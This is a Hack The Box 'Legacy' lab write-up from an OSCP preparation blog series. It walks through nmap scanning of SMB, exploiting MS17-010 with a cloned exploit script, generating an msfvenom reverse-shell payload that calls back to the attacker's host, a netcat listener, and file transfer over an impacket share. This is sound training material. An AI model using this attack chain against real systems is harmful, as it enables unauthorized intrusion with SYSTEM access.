Hack The Box: Legacy Write-up (#29)

This is my 28th box out of the 42 boxes on my OSCP preparation list. I am doing my best to learn and master the key skills for my upcoming OSCP exam by writing this series of blogs. So let's begin.
Reconnaissance
Run a full TCP scan.
nmap -sC -sV -O -p- -oA nmap/full 10.10.10.4
- -sC: Default Nmap scripts
- -sV: Service/version info
- -O: Enable OS detection
- -oA: Output scan results in 3 different formats
- -p-: Scan all ports from 1–65535
We get back the following result:
- Port 139: running the NetBIOS session service (netbios-ssn)
- Port 445: running Windows SMB (microsoft-ds), fingerprinted as Windows XP
Nmap scan report for 10.10.10.4
Host is up (0.0082s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -4h30m00s, deviation: 2h07m16s, median: -6h00m00s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:61:f7 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-08-29T07:08:17+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
...
Similarly, run a UDP scan against the same target.
nmap -sU -O -p- -oA nmap/udp 10.10.10.4
- -sU: UDP scan
We get back the following results.
- Port 137: — Running netbios-ns service.
Nmap scan report for ip-10-10-10-4.ap-southeast-1.compute.internal (10.10.10.4)
Host is up, received user-set (0.28s latency).
Scanned at 2020-08-25 09:03:24 +08 for 1s
PORT STATE SERVICE REASON VERSION
137/udp open netbios-ns udp-response ttl 127 Microsoft Windows netbios-ns (workgroup: HTB)
Service Info: Host: LEGACY; OS: Windows; CPE: cpe:/o:microsoft:windows
...
From the results above, the only likely point of entry into this box is the SMB service on ports 139 and 445.
Service Enumeration
Ports 139, 445 (SMB Service)
Let's run the Nmap smb-vuln scripts against the SMB ports (the pattern is quoted so the shell does not expand the wildcard).
nmap --script "smb-vuln*" -p139,445 10.10.10.4
We get back the following results.

The result shows this box is vulnerable to CVE-2008-4250 and CVE-2017-0143. CVE-2008-4250 is MS08-067, the Server service (NetAPI) flaw made famous by Conficker; CVE-2017-0143 is MS17-010, the SMBv1 bug family behind EternalBlue. Both give SYSTEM on an unpatched XP host without any credentials. Since the target machine is running SMBv1, we'll use MS17-010.
Exploitation
MS17-010 covers several memory-corruption bugs in srv.sys, the SMBv1 server driver of older Windows versions. EternalBlue abuses the best known of them: srv.sys miscalculates the size it needs when converting a list of OS/2 extended file attributes (FEA) to NT format, so a crafted SMBv1 transaction overflows a kernel pool buffer and the attacker's code runs in the kernel as SYSTEM. No credentials are required, which is why WannaCry and NotPetya could spread with it.
A quick Google search for "how to exploit ms17-010 without Metasploit" leads me to this article. We'll download the exploit script and run it from Kali against the target machine.
Clone the GitHub repo into /opt, the path the exploit is run from below. It is a fork of worawit's MS17-010 scripts (zzz_exploit plus an upload-and-execute wrapper), so it needs Python 2 and impacket. Unlike EternalBlue it uses the EternalRomance-style transaction bug covered by the same bulletin and needs a named pipe it can reach, which XP exposes to a null session.
git clone https://github.com/helviojunior/MS17-010.git /opt/MS17-010
Next, use msfvenom to create a reverse shell payload with the following command. EXITFUNC=thread makes the shell terminate only its own thread on exit rather than the process that runs the payload, and port 53 is used for the callback because outbound DNS is rarely filtered.
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.9 lport=53 EXITFUNC=thread -f exe -o exploit.exe
Set up a netcat listener on Kali Linux on the same port before running the exploit.
nc -nlvp 53
Now, run the exploit.
python /opt/MS17-010/send_and_execute.py 10.10.10.4 exploit.exe
We get a reverse shell.

If you look at the output above, whoami.exe is not recognised: it is not part of a default Windows XP install (it ships with Windows Server 2003 and later). We will transfer the binary manually later, but for now, let's grab user.txt.

Post-Exploitation Enumeration
To make transferring files between Kali Linux and the target easy, I set up a simple SMB share without credentials in my current working directory, where I had already placed all the necessary binaries.
Run the following command in Kali Linux.
python /usr/share/doc/python3-impacket/examples/smbserver.py tools .
I named the share tools. The Windows XP client only speaks SMB1, so no -smb2support flag is needed.
From the reverse shell, copy whoami.exe from our share to John's desktop.
C:\Documents and Settings\john\Desktop>copy \\10.10.14.9\tools\whoami.exe .
Run the whoami.exe command.

We are already in a SYSTEM shell, so no privilege escalation is needed.
Grab the root.txt flag.

Attack Strategy Map

Thank you for reading :-) Next box is Blue.